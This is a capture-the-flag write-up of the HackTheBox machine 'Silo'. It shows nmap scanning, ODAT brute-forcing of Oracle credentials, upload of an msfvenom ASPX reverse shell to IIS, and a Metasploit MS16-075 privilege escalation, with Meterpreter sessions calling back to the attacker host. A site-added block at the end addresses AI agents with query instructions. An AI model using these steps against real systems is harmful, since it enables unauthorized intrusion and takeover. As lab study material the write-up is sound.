# Silo ### Initial Enumeration ```bash # Nmap 7.70 scan initiated Sun Jul 21 16:43:41 2019 as: nmap -sV -sC -O -A -p 80,135,139,445,1521,5985,47001 -oN O-detailed 10.10.10.82 Nmap scan report for 10.10.10.82 Host is up (0.28s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/8.5 |_http-title: IIS Windows Server 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds 1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized) 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (94%), Microsoft Windows Server 2008 SP2 (93%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (93%), Microsoft Windows Server 2008 SP1 (93%), Microsoft Windows Vista SP1 (93%), Microsoft Windows 7 Professional SP1 (93%), Microsoft Windows 7 (92%), Microsoft Windows Server 2012 or Server 2012 R2 (92%), Microsoft Windows Server 2012 R2 Update 1 (92%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -6m45s, deviation: 0s, median: -6m45s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: supported | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-07-21 16:37:20 |_ start_date: 2019-07-21 16:20:43 TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 231.02 ms 10.10.14.1 2 265.03 ms 10.10.10.82 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Jul 21 16:44:11 2019 -- 1 IP address (1 host up) scanned in 30.90 seconds ``` So there are 3 web-servers, 3 SMB ports, and 1 Oracle Port. ran gobuster on all the web-servers but found nothing, dropped that vector. SMB ports, guest account was disabled and had no other credentials so dropped that too. Only port left was the Oracle Port. I found CVE-2012-1675, and it's exploit but I was not able to exploit it, either the server was not vulnerable or I had something mis-configured, so path beyond this was manual. However I found a Oracle Pentesting Kit on Github which was useful throughout the complete operation. {% embed url="" %} Find all the valid databases (SID) on this database. ```bash ./odat.py sidguesser -s 10.10.10.82 -p 1521 ``` Found XE and few other to be valid SID, however, I chose to focus on XE. Check if any default credentials are working on this database on the server. ```bash ./odat.py passwordguesser -s 10.10.10.82 -p 1521 -d XE --accounts-file accounts/accounts_lower.txt ``` NOTE: I checked both, UPPERCASE and LOWERCASE variations as 11G stores case sensitive passwords by default. Found `scott:tiger` to be a set of valid credentials. Next task was to check if this account is SYSDBA or SYSOPER on this database on the server. I used docker to run sqlplus and check this. ```bash docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysdba" -ti sflyr/sqlplus docker run -e URL="scott/tiget@//10.10.10.82:1521/XE as sysoper" -ti sflyr/sqlplus ``` It turns out that the user we had was a SYSDBA. One of the module of ODAT let's us put file on the server in a directory of our choosing, as we have web-servers running, we can be sure that there is a directory `C:\Inetpub\wwwroot` in the system, hence I chose to upload my `ASPX MSFVENOM` shell there and get a reverse shell. ```bash ./odat.py utlfile -s 10.10.10.82 -p 1521 -d XE -U scott -P tiger --putFile 'C:\inetpub\wwwroot' shell.aspx ../shell.aspx --sysdba ``` ```bash [*] Started reverse TCP handler on 10.10.14.8:9999 msf5 exploit(multi/handler) > [*] Sending stage (206403 bytes) to 10.10.10.82 [*] Meterpreter session 1 opened (10.10.14.8:9999 -> 10.10.10.82:49166) at 2019-07-21 23:03:02 +0530 msf5 exploit(multi/handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > sysinfo Computer : SILO OS : Windows 2012 R2 (Build 9600). Architecture : x64 System Language : en_GB Domain : HTB Logged On Users : 0 Meterpreter : x64/windows ``` ### User Own ```bash c:\Users\Phineas\Desktop>type user.txt type user.txt 92ede*** ``` ### Root Own ```bash msf5 exploit(multi/handler) > search local_exploit_suggester Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 post/multi/recon/local_exploit_suggester normal No Multi Recon Local Exploit Suggester msf5 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester msf5 post(multi/recon/local_exploit_suggester) > set SESSION 1 SESSION => 1 msf5 post(multi/recon/local_exploit_suggester) > show options Module options (post/multi/recon/local_exploit_suggester): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION 1 yes The session to run this module on SHOWDESCRIPTION false yes Displays a detailed description for the available exploits msf5 post(multi/recon/local_exploit_suggester) > run [*] 10.10.10.82 - Collecting local exploits for x64/windows... [*] 10.10.10.82 - 11 exploit checks are being tried... [+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable. [+] 10.10.10.82 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable. [*] Post module execution completed msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms16_075_reflection_juicy msf5 exploit(windows/local/ms16_075_reflection_juicy) > run [*] Started reverse TCP handler on 10.10.14.8:4444 [*] Launching notepad to host the exploit... [+] Process 832 launched. [*] Reflectively injecting the exploit DLL into 832... [*] Injecting exploit into 832... [*] Exploit injected. Injecting exploit configuration into 832... [*] Configuration injected. Executing exploit... [+] Exploit finished, wait for (hopefully privileged) payload execution to complete. [*] Sending stage (179779 bytes) to 10.10.10.82 [*] Meterpreter session 3 opened (10.10.14.8:4444 -> 10.10.10.82:49186) at 2019-07-21 23:08:45 +0530 ``` ```bash C:\Users\Administrator\Desktop>type root.txt type root.txt cd39e*** ``` ### Learning Outcome Setting up MSF for Oracle Pentest sucks, ODAT was a real life saver. Oracle pen-test is real fun. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jtnydv.gitbook.io/wiki/write-ups/hackthebox/windows/htb-silo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.